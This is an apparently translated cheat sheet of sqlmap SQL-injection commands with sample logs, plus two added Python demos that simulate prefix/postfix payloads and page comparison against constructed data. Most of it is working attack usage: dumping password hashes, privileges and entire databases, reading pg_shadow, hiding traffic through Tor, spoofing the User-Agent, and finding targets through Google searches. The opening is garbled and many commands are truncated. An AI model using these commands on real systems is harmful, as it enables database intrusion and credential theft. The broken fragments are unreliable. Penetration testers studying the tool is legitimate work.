Common sqlmap injection commands
[sample sqlmap output, partly garbled in extraction; only the following survives]
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
DBMS: PostgreSQL
Table: users (columns id, name); values shown: blissett, nameisnull, bunny, ming
This was compiled by mickey; not much more to say. Respect the original author: when reposting, credit it as "compiled by mickey".
Update

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
[...]m=1" -v 1 --sql-shell    // execute SQL statements interactively
-v N                          // more detailed (verbose) output; higher N prints more
Load options from a configuration INI file:
sqlmap -c sqlmap.conf
Submit with the POST method:
[...]/sqlmap/oracle/post_int.php" --method POST --data "id=1"
Submit via cookies (--cookie); separate several cookie values with ";". TamperData can be used to capture the cookies.
Spoof the Referer header with sqlmap (--referer)
Use a custom User-Agent, or pick one at random from the bundled user-agents.txt:
python sqlmap.py [...] --user-agent "Mozilla[...]"
python sqlmap.py [...] -a "[...]user-agents.txt"
Use HTTP Basic authentication (--auth-type Basic --auth-cred "user:pass")
Use Digest authentication (--auth-type Digest --auth-cred "user:pass")
Use a proxy, for example chained through Tor (8118 is Privoxy's default port, the usual HTTP front for Tor):
[...] --proxy "[...]1.47:3128"
[...] --proxy "[...]1.47:8118"
Use multiple threads for guessing (--threads N)

Skip dynamic-parameter detection and name the injectable parameter(s) directly with -p; several parameters are separated by commas; the User-Agent header can be targeted as well:
python sqlmap.py [...] -p "id"
python sqlmap.py [...] -p "cat,id"
python sqlmap.py [...] -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
Specify the back-end DBMS, skipping sqlmap's auto-detection:
[...]/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"
Supported values:
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

Specify the back-end operating system, skipping sqlmap's auto-detection:
[...]/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"
Supported values:
* Linux
* Windows
Custom payload

Options: --prefix and --postfix
In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy is when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example of a vulnerable page query, where the parameter lands inside a quoted, bracketed string:
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

Corresponding command, using the prefix and postfix visible in the request log below:
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -p "id" --prefix "')" --postfix "AND ('test'='test"
[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 ()
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]
As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and that makes the query syntactically correct with respect to the page query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without the need to provide a custom injection payload, but sometimes in real-world applications it is necessary to provide it.
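Worked example, added here and not part of mickey's compilation or of sqlmap's own code: it reproduces the prefix/postfix mechanics above against an in-memory SQLite stand-in for the page's `users` query, so the effect of `--prefix "')"` and `--postfix "AND ('test'='test"` can be checked offline. The rows in the table are constructed; the query template, payload layout and URL encoding follow the request shown above.

```python
# Added example (not from the original post or from sqlmap): shows why the
# --prefix / --postfix values above make a boolean-based payload fit a query
# whose parameter sits inside ('...'). The users table contents are constructed.
import sqlite3
from urllib.parse import quote, unquote

# Shape of the vulnerable page query from the text above (string concatenation).
TEMPLATE = "SELECT * FROM users WHERE id=('{value}') LIMIT 0, 1"

# The prefix closes the open quote and bracket; the postfix re-opens them so
# that the trailing ') LIMIT 0, 1 of the template is still valid SQL.
PREFIX = "')"
POSTFIX = "AND ('test'='test"


def setup_db():
    """In-memory stand-in for the target database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "blissett"), (2, "bunny"), (3, "ming")])
    return conn


def build_payload(value, condition, prefix=PREFIX, postfix=POSTFIX):
    """<value><prefix> <condition> <postfix>: the layout sqlmap sends."""
    return f"{value}{prefix} {condition} {postfix}"


def encode_param(name, payload):
    """URL-encode like the request in the log: '=' kept, everything else escaped."""
    return f"{name}={quote(payload, safe='=')}"


def decode_param(query_string):
    """Reverse of encode_param, to see what the server actually receives."""
    name, _, encoded = query_string.partition("=")
    return name, unquote(encoded)


def run_page_query(conn, raw_value):
    """Simulates the vulnerable page: the parameter is pasted into the SQL text."""
    return conn.execute(TEMPLATE.format(value=raw_value)).fetchall()


def boolean_test(conn, value="1"):
    """Send a TRUE (7433=7433) and a FALSE (7433=7434) probe and return both
    result sets; sqlmap flags the parameter when the two responses differ."""
    true_rows = run_page_query(conn, build_payload(value, "AND 7433=7433"))
    false_rows = run_page_query(conn, build_payload(value, "AND 7433=7434"))
    return true_rows, false_rows


def naive_payload_breaks(conn, value="1"):
    """Without the postfix the template's trailing ') LIMIT 0, 1 is left
    dangling, so the server answers with a syntax error instead of a page."""
    try:
        run_page_query(conn, f"{value}{PREFIX} AND 7433=7433")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    conn = setup_db()
    print(encode_param("id", build_payload("1", "AND 7433=7433")))
    print(boolean_test(conn))
    print("naive payload is a syntax error:", naive_payload_breaks(conn))
```

The TRUE probe returns the same row as the untouched request and the FALSE probe returns nothing, which is the response difference boolean-based detection keys on; dropping the postfix produces a syntax error instead, which is why sqlmap could not have found this injection point with its default payloads if the bracket context were unknown.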
Page comparison

python sqlmap.py -u "?id=1" --string "luther" -v 1
python sqlmap.py -u "?id=1" --regexp "lu[\w][\w]er" -v 1

Exclude dynamic page content from the comparison

python sqlmap.py -u "?id=1" --excl-reg "Dynamic content: ([\d]+)"
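The following is an added example, written for this page and not taken from mickey's post or from sqlmap: a from-scratch sketch of the page-comparison logic behind --string, --regexp and --excl-reg, plus the "url is stable" check from the logs further down. The three HTML responses are constructed; the string, regexp and exclusion pattern are the ones used in the commands above.

```python
# Added example (not from the original post or from sqlmap): the page-comparison
# logic behind --string, --regexp and --excl-reg, re-implemented in Python to
# show why a changing counter defeats plain hashing and how --excl-reg fixes it.
# The HTML responses are constructed; the patterns are the ones used above.
import hashlib
import re

STRING = "luther"                         # --string "luther"
REGEXP = r"lu[\w][\w]er"                  # --regexp "lu[\w][\w]er"
EXCL_REG = r"Dynamic content: ([\d]+)"    # --excl-reg "Dynamic content: ([\d]+)"

# Constructed responses: the TRUE page served twice (counter changed) and the FALSE page.
TRUE_PAGE = "<html><body>Welcome luther!<p>Dynamic content: 4821</p></body></html>"
TRUE_PAGE_AGAIN = "<html><body>Welcome luther!<p>Dynamic content: 4822</p></body></html>"
FALSE_PAGE = "<html><body>Welcome !<p>Dynamic content: 4823</p></body></html>"


def strip_excluded(page, excl_reg=None):
    """--excl-reg: remove every match before comparing, so per-request noise
    (counters, timestamps, tokens) does not make every response look different."""
    return re.sub(excl_reg, "", page) if excl_reg else page


def page_hash(page, excl_reg=None):
    """Digest of the (optionally filtered) body; used when no --string/--regexp is given."""
    return hashlib.md5(strip_excluded(page, excl_reg).encode()).hexdigest()


def url_is_stable(first, second, excl_reg=None):
    """The 'testing if the url is stable' step: two requests for the untouched
    URL must hash identically, otherwise --string/--regexp/--excl-reg is needed."""
    return page_hash(first, excl_reg) == page_hash(second, excl_reg)


def is_true_page(page, *, string=None, regexp=None, baseline_hash=None, excl_reg=None):
    """Classify a response as TRUE/FALSE with the same precedence as the options:
    --string (substring), then --regexp (search), else hash against the baseline."""
    if string is not None:
        return string in page
    if regexp is not None:
        return re.search(regexp, page) is not None
    if baseline_hash is None:
        raise ValueError("need --string, --regexp or a baseline hash to compare against")
    return page_hash(page, excl_reg) == baseline_hash


if __name__ == "__main__":
    print("stable without --excl-reg:", url_is_stable(TRUE_PAGE, TRUE_PAGE_AGAIN))
    print("stable with    --excl-reg:", url_is_stable(TRUE_PAGE, TRUE_PAGE_AGAIN, EXCL_REG))
    base = page_hash(TRUE_PAGE, EXCL_REG)
    for name, page in (("true", TRUE_PAGE_AGAIN), ("false", FALSE_PAGE)):
        print(name, is_true_page(page, string=STRING), is_true_page(page, regexp=REGEXP),
              is_true_page(page, baseline_hash=base, excl_reg=EXCL_REG))
```

With the counter present, two fetches of the same URL hash differently and every injected request would look "different", so detection is unreliable; a fixed --string or --regexp sidesteps the problem, and --excl-reg restores the hash comparison by blanking the noise before digesting.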
Stacked-queries test (PHP's built-in mysql_query() does not support multiple statements, so this fails against PHP/MySQL pages that use it)

python sqlmap.py -u "?id=1" --stacked-test -v 1

UNION injection test

python sqlmap.py -u "?id=1" --union-test -v 1

UNION injection test using the ORDER BY technique to find the column count

python sqlmap.py -u "?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "?id=1" -v 1 --union-use --banner
python sqlmap.py -u "?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "?id=1" -v 1 --union-use --dbs
Fingerprint

python sqlmap.py -u "?id=1" -v 1 -f
python sqlmap.py -u "?name=luther" -v 1 -f -b

Check whether the current user is a DBA

python sqlmap.py -u "?id=1" --is-dba -v 1

List database users

python sqlmap.py -u "?id=1" --users -v 0

List database users' password hashes

python sqlmap.py -u "?id=1" --passwords -v 0
python sqlmap.py -u "?id=1" --passwords -U sa -v 0

View user privileges

python sqlmap.py -u "?id=1" --privileges -v 0
python sqlmap.py -u "?id=1" --privileges -U postgres -v 0

List databases

python sqlmap.py -u "?id=1" --dbs -v 0

List the columns of a given table in a given database

python sqlmap.py -u "?id=1" --columns -T users -D test -v 1

Dump the contents of a given column of a given table in a given database

python sqlmap.py -u "?id=1" --dump -T users -D master -C surname -v 0

Dump only rows 2 to 4 (--start/--stop select a range of rows, not columns)

python sqlmap.py -u "?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump all databases and all tables

python sqlmap.py -u "?id=1" --dump-all -v 0

Dump only user-created databases and tables, skipping the system databases

python sqlmap.py -u "?id=1" --dump-all --exclude-sysdbs -v 0

SQL query

python sqlmap.py -u "?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1

Another query worth running on PostgreSQL (pg_shadow is readable only by superusers):
SELECT usename, passwd FROM pg_shadow ORDER BY usename

Save and restore a session

python sqlmap.py -u "?id=1" -b -v 1 -s "sqlmap.log"

Save the options to an INI configuration file

python sqlmap.py -u "?id=1" -b -v 1 --save
=====================================================
2. sqlmap -g "keyword"    // finds injection targets through a Google search; currently not working, reason unknown; it could be changed to use Baidu instead
3. Basic test run (detection and fingerprint output)
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1

[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[...]
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[...]
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0
4. Inject into a specified parameter
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id"

[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]

Or if you want to provide more than one parameter, for instance:
$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id"
5. Specify the method and the POST data
python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"

6. Specify a cookie, to inject into pages that require a login
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE"

7. Inject through a proxy
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"

8. Specify a string that appears on the TRUE page; this is optional, since sqlmap otherwise decides by hashing the response content
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"

9. Specify the back-end DBMS, so sqlmap does not waste requests testing the other database types
--remote-dbms    (the examples earlier on this page use the newer spelling --dbms)

10. Fingerprint the database type
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f

11. Retrieve the banner
python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b